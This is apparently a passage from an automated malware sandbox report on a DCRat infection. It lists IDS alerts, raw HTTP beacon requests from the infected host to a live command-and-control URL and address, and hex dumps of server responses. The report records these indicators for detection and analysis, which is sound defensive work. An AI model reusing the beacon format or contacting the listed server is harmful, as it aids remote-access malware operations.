Source: C:\portcontainerRef\SurrogateContainerAgent.exe, File opened: C:\Users\user\AppData\Local\Temp
Source: C:\portcontainerRef\SurrogateContainerAgent.exe, File opened: C:\Users\user

Networking

Source: Network traffic, Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49718 -> 141.8.194.149:80
Source: Network traffic, Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49716 -> 141.8.194.149:80
Source: Network traffic, Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49720 -> 141.8.194.149:80
Source: Network traffic, Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49714 -> 141.8.194.149:80
Source: Network traffic, Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49719 -> 141.8.194.149:80
Source: Network traffic, Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49715 -> 141.8.194.149:80
Source: Joe Sandbox View, IP Address: 141.8.194.149
Source: Joe Sandbox View, ASN Name: SPRINTHOSTRU
Source: global traffic, HTTP traffic detected:
    GET /d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF HTTP/1.1
    Accept: */*
    Content-Type: application/json
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: a1025223.xsph.ru
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF HTTP/1.1
    Accept: */*
    Content-Type: application/json
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: a1025223.xsph.ru
Source: global traffic, HTTP traffic detected:
    GET /d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0 HTTP/1.1
    Accept: */*
    Content-Type: text/html
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: a1025223.xsph.ru
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0 HTTP/1.1
    Accept: */*
    Content-Type: text/html
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: a1025223.xsph.ru
Source: global traffic, HTTP traffic detected:
    GET /d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT HTTP/1.1
    Accept: */*
    Content-Type: text/plain
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    Host: a1025223.xsph.ru
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT HTTP/1.1
    Accept: */*
    Content-Type: text/plain
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    Host: a1025223.xsph.ru
Source: global traffic, HTTP traffic detected:
    GET /d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz HTTP/1.1
    Accept: */*
    Content-Type: text/plain
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: a1025223.xsph.ru
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz HTTP/1.1
    Accept: */*
    Content-Type: text/plain
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: a1025223.xsph.ru
Source: global traffic, HTTP traffic detected:
    GET /d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc HTTP/1.1
    Accept: */*
    Content-Type: text/csv
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: a1025223.xsph.ru
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc HTTP/1.1
    Accept: */*
    Content-Type: text/csv
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: a1025223.xsph.ru
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: a1025223.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: a1025223.xsph.ru
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: a1025223.xsph.ruConnection: Keep-Alive
            Source: global traffic DNS traffic detected: DNS query: a1025223.xsph.ru
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 27 Sep 2024 06:42:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 27 Sep 2024 06:42:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 27 Sep 2024 06:42:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 27 Sep 2024 06:42:45 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 27 Sep 2024 06:42:56 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 27 Sep 2024 06:42:57 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 27 Sep 2024 06:43:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 27 Sep 2024 06:43:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 27 Sep 2024 06:43:35 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding
68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 27 Sep 2024 06:43:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 
68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 27 Sep 2024 06:43:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 
68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 27 Sep 2024 06:43:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 
68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.000000000307E000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000003059000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 